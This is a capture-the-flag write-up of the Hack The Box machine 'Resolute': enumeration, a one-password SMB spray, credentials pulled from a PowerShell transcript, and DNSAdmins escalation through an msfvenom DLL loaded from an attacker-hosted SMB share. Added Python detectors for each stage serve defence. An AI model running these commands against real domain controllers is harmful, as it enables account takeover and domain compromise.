Hackthebox – Resolute
As with any box, I started Resolute with several nmap scans.
root@kalivm:~/Resolute# nmap -sTV -p 1-65535 -oN fullscan_tcp 10.10.10.169
Starting Nmap 7.80 (https://nmap.org ) at 2020-03-07 08:56 CET
Nmap scan report for 10.10.10.169
Host is up (0.018s latency).
Not shown: 65511 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-07 08:05:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
49907/tcp open msrpc Microsoft Windows RPC
49924/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/7%Time=5E6353B3%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.52 seconds
So various ports are open, which indicates that this is a domain controller for the megabank.local domain. Port 445 (SMB) and port 5985 (WinRM) are open as well. Furthermore, it was quite interesting to see that the nmap -A scan gave some errors on the DNS port, which had not happened on other Windows boxes so far. After some playing around with ldapsearch, as on Hackthebox – Sauna, I found the output slightly overwhelming and decided to go back to the enum4linux tool to see whether that would generate some interesting output too.
root@kalivm:~/Resolute# enum4linux -a 10.10.10.169
---snip---
=============================
| Users on 10.10.10.169 |
=============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela Name: (null) Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette Name: (null) Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika Name: (null) Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire Name: (null) Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude Name: (null) Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia Name: (null) Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null) Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo Name: (null) Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (null) Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki Name: (null) Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo Name: (null) Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per Name: (null) Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally Name: (null) Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon Name: (null) Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve Name: (null) Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie Name: (null) Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita Name: (null) Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf Name: (null) Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null) Desc: (null)
---snip---
So newly created accounts get the password Welcome123!. Could it be that one of these users has not yet logged in, or did not change the password after all?
root@kalivm:~/Resolute# msfconsole
---snip---
msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.169
rhosts => 10.10.10.169
msf5 auxiliary(scanner/smb/smb_login) > set user_file users.txt
user_file => users.txt
msf5 auxiliary(scanner/smb/smb_login) > set smbpass Welcome123!
smbpass => Welcome123!
msf5 auxiliary(scanner/smb/smb_login) > run
[*] 10.10.10.169:445 - 10.10.10.169:445 - Starting SMB login bruteforce
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\abigail:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\angela:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\annette:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\annika:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\claire:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\claude:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\felicia:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\fred:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\gustavo:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\marcus:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\marko:Welcome123!',
[+] 10.10.10.169:445 - 10.10.10.169:445 - Success: '.\melanie:Welcome123!'
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\naoki:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\paulo:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\per:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\ryan:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\sally:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\simon:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\steve:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\stevie:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\sunita:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\ulf:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\zach:Welcome123!',
[*] 10.10.10.169:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Marko has clearly changed his password, but apparently melanie has not! With this password I could possibly log in using WinRM. Would this be enough for user?
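From the defender's side, the sweep above has a very recognisable shape in the domain controller's Security log: one failed logon (event 4625) per enumerated account from a single source address within a few seconds, then a single success (4624). Per-account lockout thresholds never trip on this, because every account is tried exactly once, so the correlation has to be keyed on the source rather than the target user. The script below is an added example, not part of this write-up; the log lines, the pipe-separated format and the thresholds (five distinct accounts in five minutes) are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample Security-log events, one per line:
#   timestamp|event_id|target_user|source_ip
# 4625 = failed logon, 4624 = successful logon. The first group mimics what a
# one-password sweep over an enumerated user list looks like on the DC; the
# second group is an ordinary user mistyping a password twice.
SAMPLE_LOG = """\
2020-03-07T09:01:00|4625|abigail|10.10.15.66
2020-03-07T09:01:01|4625|angela|10.10.15.66
2020-03-07T09:01:02|4625|annette|10.10.15.66
2020-03-07T09:01:03|4625|annika|10.10.15.66
2020-03-07T09:01:04|4625|claire|10.10.15.66
2020-03-07T09:01:05|4624|melanie|10.10.15.66
2020-03-07T09:01:06|4625|naoki|10.10.15.66
2020-03-07T09:05:00|4625|ryan|10.10.14.2
2020-03-07T09:07:00|4625|ryan|10.10.14.2
2020-03-07T09:09:00|4624|ryan|10.10.14.2
"""


def parse_events(text):
    """Turn the pipe-separated sample format into a list of event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, user, ip = line.split("|")
        events.append({"time": datetime.fromisoformat(ts),
                       "event_id": int(eid),
                       "user": user.lower(),
                       "source_ip": ip})
    return events


def find_sprays(events, window=timedelta(minutes=5), min_users=5):
    """Flag every source IP whose failed logons hit at least `min_users`
    distinct accounts within `window`. Accounts that succeeded from the same
    source are listed so they can be reset first."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev["source_ip"]].append(ev)

    alerts = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["time"])
        failures = [e for e in evs if e["event_id"] == 4625]
        start = 0
        for end in range(len(failures)):
            # Slide the window start forward until the span fits in `window`.
            while failures[end]["time"] - failures[start]["time"] > window:
                start += 1
            users = {e["user"] for e in failures[start:end + 1]}
            if len(users) >= min_users:
                successes = sorted({e["user"] for e in evs
                                    if e["event_id"] == 4624})
                alerts.append({"source_ip": ip,
                               "distinct_failed_users": len(users),
                               "successful_users": successes})
                break  # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for alert in find_sprays(parse_events(SAMPLE_LOG)):
        print(alert)
```

Run against the sample, the attacker address is reported with melanie as the account that authenticated, while the second address never reaches the distinct-user threshold and stays quiet. The other fix this box illustrates is procedural: an onboarding password that is written into the account description, and that users are not forced to change at first logon, is exactly what makes a one-password sweep worthwhile.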
root@kalivm:~/Resolute# ruby melanie.rb
PS > whoami
megabank\melanie
PS > pwd
Path
----
C:\Users\melanie\Documents
PS > dir ../Desktop
Directory: C:\Users\melanie\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/3/2019 7:33 AM 32 user.txt
Apparently it is! With the WinRM shell from Hackthebox – Forest I can now log in as user melanie and obtain the flag!
PS > type ../Desktop/user.txt
0c3be45<NOFLAG>96ccbee8d3a978540
Privilege Escalation
For privilege escalation, it all started with some of the common privilege escalation tricks. After fiddling with those for a while, I found nothing useful and resorted to the forums, where two hints were mentioned. The first hint was to look closely at the files in the root of the drive. The other hint was that it had something to do with group memberships and privileges.
The first step was to look at the root of the system. At first glance I had not discovered anything interesting, but by default the dir command does not show hidden files.
PS > dir -force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d----- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 3/6/2020 11:59 PM 402653184 pagefile.sys
Using the dir -force command, I was able to show hidden directories too, and that PSTranscripts directory looks quite interesting. I had not seen it while looking with a normal ‘dir’ command.
PS > cd PSTranscripts
PS > dir
PS >
Again no files here? Let's try again with -force.
PS > dir -force
Directory: C:\PSTranscripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--h-- 12/3/2019 6:45 AM 20191203
PS > cd 20191203
PS > dir -force
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
Now there is something interesting: a PowerShell transcript file.
PS > type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
---snip---
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
---snip---
Now that looks like a username/password combination.
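PowerShell transcription records every command as typed, so any credential passed on a command line ends up in plain text in the transcript. Hiding the output directory with a file attribute, as on this box, is no protection at all: only the directory's ACL is. A useful defensive habit is to scan transcript files for credential-bearing commands so they can be rotated and the scripts fixed. The scanner below is an added example, not code from this write-up; the transcript text is constructed to mimic the layout shown above (with a placeholder instead of the real password), and the regular expressions are heuristics for the commonest patterns, not an exhaustive list.

```python
import re

# Constructed transcript fragment in the same layout PowerShell writes.
# <REDACTED_PASSWORD> is a placeholder, not the value from the box.
SAMPLE_TRANSCRIPT = r'''**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan <REDACTED_PASSWORD>"
**********************
Command start time: 20191203063600
**********************
PS>Get-ChildItem X:
**********************
Command start time: 20191203063700
**********************
PS>$s = ConvertTo-SecureString -AsPlainText "<REDACTED_PASSWORD>" -Force
'''

# Transcript line shapes we care about.
CMD_START = re.compile(r"^Command start time: (\d{14})$")
PS_PROMPT = re.compile(r"^PS>(.*)$")
PARAM_BINDING = re.compile(
    r'^>> ParameterBinding\([^)]*\): name="(\w+)"; value="(.*)"$')

# Heuristic patterns for commands that carry a secret inline.
CREDENTIAL_PATTERNS = {
    # `net use <drive> \\server\share <password> ...`: any token after the
    # share that is not a /switch is a positional password.
    "net use with positional password":
        re.compile(r"\bnet\s+use\s+(?:\S+\s+)?\\\\\S+\s+(?!/)\S+", re.I),
    "ConvertTo-SecureString -AsPlainText":
        re.compile(r"ConvertTo-SecureString\b.*-AsPlainText", re.I),
    "explicit password argument":
        re.compile(r"\s-(?:Password|Pass|Pwd)\s+\S+", re.I),
}


def iter_commands(text):
    """Yield (start_time, command_text) for each command in a transcript.
    Invoke-Expression shows up as a CommandInvocation line plus a
    ParameterBinding line; the latter holds the real command string."""
    start = None
    for line in text.splitlines():
        m = CMD_START.match(line)
        if m:
            start = m.group(1)
            continue
        m = PARAM_BINDING.match(line)
        if m:
            yield start, m.group(2)
            continue
        m = PS_PROMPT.match(line)
        if m and not m.group(1).startswith("CommandInvocation("):
            yield start, m.group(1)


def find_credentials(text):
    """Return one hit per (command, pattern) match, oldest first."""
    hits = []
    for start, cmd in iter_commands(text):
        for label, pattern in CREDENTIAL_PATTERNS.items():
            if pattern.search(cmd):
                hits.append({"start_time": start, "kind": label, "command": cmd})
    return hits


if __name__ == "__main__":
    for hit in find_credentials(SAMPLE_TRANSCRIPT):
        print(hit["start_time"], hit["kind"], "->", hit["command"])
```

On the sample this reports the `net use` line and the `ConvertTo-SecureString -AsPlainText` line and ignores the harmless directory listing. In a real deployment the transcript directory should be a central share writable by clients and readable only by the security team, and `net use` should be given `/user:` with the password prompted (`*`) rather than typed into the command line.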
PS > whoami
megabank\ryan
After modifying the Ruby WinRM script to contain that username/password combination, I was indeed logged in as user ryan! The next step is hopefully towards NT AUTHORITY\SYSTEM or similar. With the strange error in the DNS part of the port scan in mind, and the fact that privilege escalation should have something to do with services, it is time to see whether I can check the DNS server configuration.
PS > whoami
megabank\melanie
PS > dnscmd resolute /info
Info query failed
status = 5 (0x00000005)
Command failed: ERROR_ACCESS_DENIED 5 0x5
As melanie, I get an Access Denied error.
PS > whoami
megabank\ryan
PS > dnscmd resolute /info
Query result:
Server info
server name = Resolute.megabank.local
version = 3839000A (10.0 build 14393)
DS container = cn=MicrosoftDNS,cn=System,DC=megabank,DC=local
forest name = megabank.local
domain name = megabank.local
---snip---
As ryan, however, I get the DNS server information back from the current host (resolute). After a short search, I ended up at the well-known ired.team site, which gives a very nice write-up of getting NT AUTHORITY\SYSTEM privileges through the DNSAdmins group membership that ryan apparently had. So the next steps are to create a malicious DLL, have the DNS service load it, restart the service and become root. Should be simple then!
root@kalivm:~/Resolute# msfvenom -p windows/x64/exec cmd='net group "domain admins" ryan /add /domain' -f dll > ryan.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 311 bytes
Final size of dll file: 5120 bytes
Now that the DLL is ready, all that is left is to start the SMB server, have the DNS service load the DLL, and restart the service. So in another terminal, I start the Impacket SMB server.
root@kalivm:~/Resolute# smbserver.py -ip 10.10.15.66 reso ./
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Back at the winRM terminal, I reconfigure the DNS server to load the dll file and restart it.
PS > dnscmd resolute /config /serverlevelplugindll \\10.10.15.66\reso\ryan.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
PS > sc.exe \\resolute stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x1
WAIT_HINT : 0x7530
PS > sc.exe \\resolute start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 728
FLAGS :
Meanwhile in the smbserver terminal, I notice the file getting picked up.
[*] Incoming connection (10.10.10.169,55313)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:4141414141414141:da9c011f6585aa15d96fa3d560a4686d:010100000000000080162fcb66f4d5013dccd4c800749c8200000000010010004700540066005100640045004d006700020010007400660076006c006b004c0054007500030010004700540066005100640045004d006700040010007400660076006c006b004c00540075000700080080162fcb66f4d5010600040002000000080030003000000000000000000000000040000025b8adeb17d8ccfcf835d16b77e9c708dacb6cb9215921456a9ef365b1dd600c0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310035002e00360036000000000000000000
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:RESO)
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.10.10.169,55313)
[*] Remaining connections []
Now all that is left is to check whether ryan has indeed been added to the Domain Admins group.
PS > net user /domain ryan
User name ryan
Full Name Ryan Bertrand
---snip---
Local Group Memberships
Global Group memberships *Domain Admins *Domain Users
*Contractors
The command completed successfully.
And he has been added. So now I should be able to start a new WinRM shell and access the Administrator’s home directory.
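Seen from the blue team, the escalation just performed leaves three separate, loud artifacts on the domain controller: a `dnscmd ... /config /serverlevelplugindll` command line (the registry value lives under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters), a stop/start of the DNS Server service by a non-administrative user, and a Domain Admins membership change performed by the machine account. Each is worth an alert on its own; all three inside a few minutes are a near-certain DNSAdmins abuse. The detector below is an added example, not code from this write-up or from ired.team. It assumes events already normalised into dicts with the fields shown (process creation with command-line auditing as event 4688, Service Control Manager state changes as 7036, global group membership additions as 4728); the events themselves are constructed, with the DLL path taken from the command shown above.

```python
import re
from datetime import datetime, timedelta

# Constructed, normalised events in the order the escalation produced them,
# plus one benign dnscmd invocation at the end that must not fire.
SAMPLE_EVENTS = [
    {"time": "2020-03-07T10:00:00", "event_id": 4688, "user": "MEGABANK\\ryan",
     "command_line": r"dnscmd resolute /config /serverlevelplugindll \\10.10.15.66\reso\ryan.dll"},
    {"time": "2020-03-07T10:00:20", "event_id": 4688, "user": "MEGABANK\\ryan",
     "command_line": r"sc.exe \\resolute stop dns"},
    {"time": "2020-03-07T10:00:25", "event_id": 7036, "user": "NT AUTHORITY\\SYSTEM",
     "message": "The DNS Server service entered the stopped state."},
    {"time": "2020-03-07T10:00:30", "event_id": 4688, "user": "MEGABANK\\ryan",
     "command_line": r"sc.exe \\resolute start dns"},
    {"time": "2020-03-07T10:00:35", "event_id": 7036, "user": "NT AUTHORITY\\SYSTEM",
     "message": "The DNS Server service entered the running state."},
    {"time": "2020-03-07T10:00:36", "event_id": 4728, "user": "MEGABANK\\RESOLUTE$",
     "group": "Domain Admins", "member": "MEGABANK\\ryan"},
    {"time": "2020-03-07T12:00:00", "event_id": 4688, "user": "MEGABANK\\admin",
     "command_line": r"dnscmd resolute /info"},
]

PLUGIN_DLL_RE = re.compile(r"\bdnscmd\b.*?/serverlevelplugindll\s+(\S+)", re.I)
DNS_SVC_CTL_RE = re.compile(r"\bsc(?:\.exe)?\b.*\b(stop|start)\s+dns\b", re.I)
SYSTEM32_RE = re.compile(r"^[a-z]:\\windows\\system32\\", re.I)


def plugin_dll_is_suspicious(path):
    """True when a ServerLevelPluginDll value points at a UNC path or anywhere
    outside System32. Empty means no plugin configured, the expected state.
    Usable both on the live registry value and on a command-line argument."""
    if not path:
        return False
    return path.startswith("\\\\") or not SYSTEM32_RE.match(path)


def classify(event):
    """Map one event to (rule_name, detail) or None if it is uninteresting."""
    eid = event["event_id"]
    if eid == 4688:
        cmd = event.get("command_line", "")
        m = PLUGIN_DLL_RE.search(cmd)
        if m:
            path = m.group(1)
            return ("dns_plugin_dll_set",
                    {"path": path, "untrusted_location": plugin_dll_is_suspicious(path)})
        m = DNS_SVC_CTL_RE.search(cmd)
        if m:
            return ("dns_service_control", {"action": m.group(1).lower()})
    elif eid == 7036 and "DNS Server" in event.get("message", ""):
        return ("dns_service_state_change", {"message": event["message"]})
    elif eid == 4728 and event.get("group", "").lower() == "domain admins":
        return ("domain_admins_member_added", {"member": event["member"]})
    return None


def detect_chain(events, window=timedelta(minutes=10)):
    """Emit one alert per matching event, plus a 'dnsadmins_escalation_chain'
    alert when a plugin DLL is set and, within `window`, the DNS service
    changes state and someone is added to Domain Admins."""
    findings = []
    for ev in events:
        hit = classify(ev)
        if hit:
            findings.append((datetime.fromisoformat(ev["time"]), ev, hit[0], hit[1]))

    alerts = [{"rule": rule, "time": ev["time"], "user": ev["user"], **detail}
              for _, ev, rule, detail in findings]
    for t0, ev0, rule0, d0 in findings:
        if rule0 != "dns_plugin_dll_set":
            continue
        later = {rule for t, _, rule, _ in findings if t0 <= t <= t0 + window}
        if {"dns_service_state_change", "domain_admins_member_added"} <= later:
            alerts.append({"rule": "dnsadmins_escalation_chain", "time": ev0["time"],
                           "user": ev0["user"], "dll": d0["path"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_chain(SAMPLE_EVENTS):
        print(alert)
```

The mitigations are as simple as the detection: keep DNSAdmins empty or limited to accounts treated as tier-0, alert on any change to the ServerLevelPluginDll value, and periodically assert with `plugin_dll_is_suspicious` that the value is empty on every DNS server. Note that a plugin DLL placed under System32 still loads; the function only lowers confidence for that case, it does not clear it.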
root@kalivm:~/Resolute# ruby ryan.rb
PS > cd c:\users\administrator\desktop
PS > dir
Directory: C:\users\administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/3/2019 7:32 AM 32 root.txt
So I can read the directory and there is the root flag, and with Ryan’s newfound privileges, I can now access it and complete this box!
PS > type root.txt
e1d9487<NOFLAG>d0c20edb5405e619c